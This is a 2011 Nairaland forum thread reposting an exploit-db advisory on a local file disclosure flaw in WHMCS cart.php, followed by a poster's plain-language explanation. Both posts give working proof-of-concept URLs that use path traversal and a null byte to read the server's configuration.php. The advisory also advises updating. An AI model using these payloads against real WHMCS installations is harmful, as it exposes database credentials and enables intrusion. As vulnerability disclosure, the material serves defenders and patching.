Welcome, Guest: Register On Nairaland / LOGIN! / Trending / Recent / New
Stats: 3,143,364 members, 7,780,997 topics. Date: Friday, 29 March 2024 at 07:12 AM

Whmcompletesolution (cart.php) Local File Disclosure - Webmasters - Nairaland

Nairaland Forum / Science/Technology / Webmasters / Whmcompletesolution (cart.php) Local File Disclosure (4946 Views)

Liberty Reserve Payment Module For Interspire Shopping Cart. / Integrating Interswitch's Webpay With Joomla's Virtuemart(shopping Cart) / Which Open Source Shopping Cart Would You Choose? (2) (3) (4)

(1) (Reply)

Whmcompletesolution (cart.php) Local File Disclosure by Slyr0x: 11:13am On Oct 20, 2011
# Title      : WHMCompleteSolution (cart.php) Local File Disclosure
# Author     : Lagripe-Dz
# Product    : WHMCS ( WHMCompleteSolution )
# Vendor     : http://whmcs.com/
# Date       : 10/01/2011
# Version    : 3.x.x , 4.0.x
# Tested on  : linux+apache

================================================================

Vuln file: cart.php
---------

Vuln code:
---------

if ( $a == "add" )
{
   $templatefile = "configureproductdomain";
    , etc
}

if ( $a == "login" )
{
    $templatefile = "login";
    , etc
}
,
outputClientArea( $templatefile, $nowrapper );
# outputClientArea function will display
"./templates/orderforms/cart/{$templatefile}.tpl"


Details :
---------

if variable "$a" has a true value ,  will set "$templatefile" value by
default
but when "$a" value didn't match the defaults values
you can control "$templatefile" and use it as ( File Disclosure )


Proof of Concept :
------------------

http://domain.tld/[PATH]/cart.php?a=[wrong_value]&templatefile=[LFD]%00

http://domain.tld/[PATH]/cart.php?a=test&templatefile=, /, /, /configuration.php%00


note* : show the page source to see Disclosure file.

Solution :
----------

Update to the latest version

http://www.exploit-db.com/exploits/17999/
Re: Whmcompletesolution (cart.php) Local File Disclosure by Slyr0x: 11:20am On Oct 20, 2011
So it won't look like I posted Jargons, lemme just explain.

Basically there is a Local File Disclosure vulnerability in WHMCS Versions - 3.x.x , 4.0.x.

How does it work?

An attacker can pull off "sensitive files" off your server with this exploit below

"/cart.php?a=test&templatefile=, /, /, /configuration.php%00" by doing this

http://example.com/cart.php?a=test&templatefile=, /, /, /configuration.php%00

where http://example.com is the vulnerable WHMCS site.
Re: Whmcompletesolution (cart.php) Local File Disclosure by gorimapa1(m): 3:58pm On Oct 20, 2011
Karamba

(1) (Reply)

Tips For Optimizing A Blog For Search Engines Web Visitors / Pls Help Me With Ozeki Ng Activation Code / 5 Steps To Get Your Website Indexed Faster On Google

(Go Up)

Sections: politics (1) business autos (1) jobs (1) career education (1) romance computers phones travel sports fashion health
religion celebs tv-movies music-radio literature webmasters programming techmarket

Links: (1) (2) (3) (4) (5) (6) (7) (8) (9) (10)

Nairaland - Copyright © 2005 - 2024 Oluwaseun Osewa. All rights reserved. See How To Advertise. 8
Disclaimer: Every Nairaland member is solely responsible for anything that he/she posts or uploads on Nairaland.